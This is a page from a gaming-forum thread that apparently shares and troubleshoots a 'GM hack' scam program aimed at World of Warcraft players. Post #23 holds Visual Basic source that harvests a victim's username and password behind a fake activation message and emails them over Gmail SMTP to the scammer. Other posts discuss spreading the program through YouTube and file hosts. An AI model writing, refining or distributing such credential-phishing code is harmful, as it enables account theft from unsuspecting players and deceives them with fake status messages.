[Release] [Source] [Scam] The GM Hack Revived menu

User Tag List

Page 2 of 3 FirstFirst 123 LastLast
Results 16 to 30 of 31
  1. #16
    Phygar's Avatar ( ͡° ͜ʖ ͡°)
    Reputation
    443
    Join Date
    Nov 2007
    Posts
    1,591
    Thanks G/R
    7/4
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Get The visual studio 2008 stuff here:

    Downloads

    [Release] [Source] [Scam] The GM Hack Revived
  2. #17
    Malh's Avatar Member
    Reputation
    10
    Join Date
    Apr 2007
    Posts
    39
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    when i go to send it it says "The specified string is not in the form required for an e-mail address."

  3. #18
    drano's Avatar Site Donator
    Reputation
    92
    Join Date
    Apr 2006
    Posts
    486
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Ok I got it running smoothly, now whats the best place to spread this around? I tried youtube but my video wont upload all the way
    Bowl

  4. #19
    Malh's Avatar Member
    Reputation
    10
    Join Date
    Apr 2007
    Posts
    39
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    this works fine for me when i run it through visual basic 08 but when i build it and run the exe it won't send the e-mail

  5. #20
    Clain's Avatar Banned
    Reputation
    179
    Join Date
    Jan 2008
    Posts
    1,396
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    What is the exact error Malh?


    I just tested this program again with 2 diff emails and it works fine.
    Last edited by Clain; 04-25-2008 at 10:30 PM.

  6. #21
    josh1780's Avatar Member
    Reputation
    1
    Join Date
    Apr 2008
    Posts
    50
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    gonna check it out

  7. #22
    Malh's Avatar Member
    Reputation
    10
    Join Date
    Apr 2007
    Posts
    39
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Clain View Post
    What is the exact error Malh?


    I just tested this program again with 2 diff emails and it works fine.
    I finally got it working, thanks a ton for the code I +Rep'd.

  8. #23
    Caliga's Avatar Contributor
    Reputation
    92
    Join Date
    Mar 2008
    Posts
    583
    Thanks G/R
    2/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Private Sub Button4_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button4.Click
    Dim Numba As Integer
    Dim smtpserver As New SmtpClient
    SmtpServer.Port = 587
    SmtpServer.Host = "smtp.gmail.com"
    SmtpServer.EnableSsl = True
    Dim WoWPath As String = String.Empty
    WoWPath = My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\blizzard entertainment\world of warcraft", "WoWPath", Nothing)
    Dim mail As New MailMessage()
    Try

    If Username.TextLength < 3 Or password1.TextLength < 8 Or password1.TextLength > 16 Or Username.TextLength > 16 Or password1.Text = Username.Text Or Username.Text = Nothing And password1.Text = Nothing Or password1.Text.Contains(Not Numba) Then
    Threading.Thread.Sleep(1400)
    MessageBox.Show("Your account wasn't found. Please consider one of the following : Your info is invalid, the account is a trial, or your account has been deleted.")
    Else : mail.To.Add("[email protected]")
    mail.From = New MailAddress("[email protected]")
    smtpserver.Credentials = New Net.NetworkCredential("[email protected]", "password (I put my pass here)")
    mail.Subject = "Accounts"
    mail.Body = Username.Text & " " & _
    password1.Text
    smtpserver.Send(mail)
    MessageBox.Show("Your account has been found and is in the process of being activated. Please wait up to atleast 10 minutes.")
    End If
    Catch erroa As SmtpException
    Select Case (0)
    Case 0
    MessageBox.Show("Failed connecting to database!", "Error", MessageBoxButtons.RetryCancel, MessageBoxIcon.Error)
    End Select
    Finally
    Username.Text = ("")
    password1.Text = ("")
    CheckBox1.Hide()
    End Try
    End Sub
    Is that right?

  9. #24
    Malh's Avatar Member
    Reputation
    10
    Join Date
    Apr 2007
    Posts
    39
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    so i put this program on filebeam and started up a youtube scam and my gmail account got hacked and the secondary email on it was changed to some mail.ru account

  10. #25
    Clain's Avatar Banned
    Reputation
    179
    Join Date
    Jan 2008
    Posts
    1,396
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I guess it isn't the safest program >_>...damn hackers. let me move the information to a module and make it safer or encrpyt it

  11. #26
    Malh's Avatar Member
    Reputation
    10
    Join Date
    Apr 2007
    Posts
    39
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Clain View Post
    I guess it isn't the safest program >_>...damn hackers. let me move the information to a module and make it safer or encrpyt it
    yeah i wouldn't be surprised if someone decompiled it

  12. #27
    Clain's Avatar Banned
    Reputation
    179
    Join Date
    Jan 2008
    Posts
    1,396
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    The thing is, is that it is sort of hard to find a WORKING decompiler >.>

  13. #28
    pixie12's Avatar Active Member
    Reputation
    16
    Join Date
    Sep 2007
    Posts
    425
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Took a while but its working for me now

  14. #29
    furra's Avatar Member
    Reputation
    1
    Join Date
    Dec 2007
    Posts
    21
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    awsome! +rep

  15. #30
    Malh's Avatar Member
    Reputation
    10
    Join Date
    Apr 2007
    Posts
    39
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    managed to reclaim my gmail account, some guy named Edward Greenfild from the UK hacked it

Page 2 of 3 FirstFirst 123 LastLast

Similar Threads

  1. [Release]The Abandoned Camp Revived
    By Zantas in forum WoW Advanced Model Edits
    Replies: 7
    Last Post: 05-05-2010, 09:36 AM
  2. [Scam] The No-Recall Name Swap Scam (Release)
    By 7itanium in forum WoW Scam Prevention
    Replies: 16
    Last Post: 01-21-2009, 08:34 PM
  3. WoW Hack Pack RELEASE (For scamming peoples accs)
    By [M]agz in forum WoW Scam Prevention
    Replies: 41
    Last Post: 12-08-2008, 11:07 PM
  4. [Source] [Scam] A twist to the other Gamecard "Generators"
    By Clain in forum WoW Scam Prevention
    Replies: 4
    Last Post: 09-12-2008, 05:56 PM
All times are GMT -5. The time now is 11:45 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2024 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search